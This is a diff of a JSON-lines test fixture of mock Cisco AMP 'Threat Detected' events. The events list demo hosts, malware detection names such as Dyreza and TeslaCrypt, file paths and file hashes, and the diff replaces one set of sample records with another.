-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537365","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258118058508000,"timestamp":1610705633,"timestamp_nanoseconds":636000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258118058508361","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667837389570000,"timestamp":1610705633,"timestamp_nanoseconds":689000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667837389570068","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258066518901000,"timestamp":1610705621,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:13:41+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258066518900808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258014979293000,"timestamp":1610705609,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:13:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258014979293255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257963439686000,"timestamp":1610705597,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:13:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257963439685702","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":778000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667579691532307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":747000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532306","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":371000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667575396565000,"timestamp":1610705572,"timestamp_nanoseconds":971000000,"date":"2021-01-15T10:12:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667575396565008","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
\ No newline at end of file
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196256","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":365000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196254","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196253","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":287000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":256000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
